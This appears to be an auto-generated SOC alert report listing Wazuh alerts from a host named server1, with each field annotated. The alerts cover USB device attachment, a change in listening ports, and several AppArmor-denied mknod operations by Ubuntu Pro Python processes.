SOCscribe - Alert Report

Attached USB Storage

🧠 What happened? Attached USB Storage

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:00.185+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:00.185+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Attached USB Storage
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  81101
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['usb']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.8']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533320.0
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:21:59.791313+00:00 server1 kernel: usb 2-2.1: New USB device found, idVendor=0e0f, idProduct=0008, bcdDevice= 1.00
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:21:59.791313+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.id:  usb
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Attached USB Storage

🧠 What happened? Attached USB Storage

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:00.188+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:00.188+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Attached USB Storage
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  81101
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['usb']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.8']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533320.266
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:21:59.791313+00:00 server1 kernel: usb 2-2.1: New USB device found, idVendor=0e0f, idProduct=0008, bcdDevice= 1.00
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:21:59.791313+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.id:  usb
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Listened ports status (netstat) changed (new port opened or closed).

🧠 What happened? Listened ports status (netstat) changed (new port opened or closed).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:00.621+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:00.621+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Listened ports status (netstat) changed (new port opened or closed).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  533
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533320.532
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

previous_output:  Previous output: ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/systemd tcp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv tcp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv tcp 0.0.0.0:443 0.0.0.0:* 62808/node tcp 0.0.0.0:1514 0.0.0.0:* 60647/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 60521/wazuh-authd tcp6 127.0.0.1:9200 :::* 16883/java tcp6 127.0.0.1:9300 :::* 16883/java tcp 0.0.0.0:55000 0.0.0.0:* 60481/python3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

full_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/systemd tcp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv tcp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 192.168.6.137:68 0.0.0.0:* 4024/systemd-networ tcp 0.0.0.0:443 0.0.0.0:* 62808/node tcp 0.0.0.0:1514 0.0.0.0:* 60647/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 60521/wazuh-authd tcp6 127.0.0.1:9200 :::* 16883/java tcp6 127.0.0.1:9300 :::* 16883/java tcp 0.0.0.0:55000 0.0.0.0:* 60481/python3
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

previous_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/systemd tcp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv tcp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv tcp 0.0.0.0:443 0.0.0.0:* 62808/node tcp 0.0.0.0:1514 0.0.0.0:* 60647/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 60521/wazuh-authd tcp6 127.0.0.1:9200 :::* 16883/java tcp6 127.0.0.1:9300 :::* 16883/java tcp 0.0.0.0:55000 0.0.0.0:* 60481/python3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  netstat listening ports
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:02.623+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.623+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.1926
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.440199+00:00 server1 kernel: audit: type=1400 audit(1745533322.436:1021): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/__init__.cpython-312.pyc.124504254074288" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.440199+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.2559
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.448985+00:00 server1 kernel: audit: type=1400 audit(1745533322.445:1022): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/log.cpython-312.pyc.124504258771216" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.448985+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.3187
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.473370+00:00 server1 kernel: audit: type=1400 audit(1745533322.471:1024): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/secret_manager.cpython-312.pyc.124504252962736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.473370+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.3826
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.470997+00:00 server1 kernel: audit: type=1400 audit(1745533322.469:1023): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/defaults.cpython-312.pyc.124504252962736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.470997+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.4459
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.495638+00:00 server1 kernel: audit: type=1400 audit(1745533322.493:1025): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_apt_news" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/__init__.cpython-312.pyc.132628381628208" pid=76916 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.495638+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.5091
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.508884+00:00 server1 kernel: audit: type=1400 audit(1745533322.503:1026): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/system.cpython-312.pyc.124504252964784" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.508884+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.5722
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.572878+00:00 server1 kernel: audit: type=1400 audit(1745533322.569:1029): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/messages/__pycache__/__init__.cpython-312.pyc.124504252186160" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.572878+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

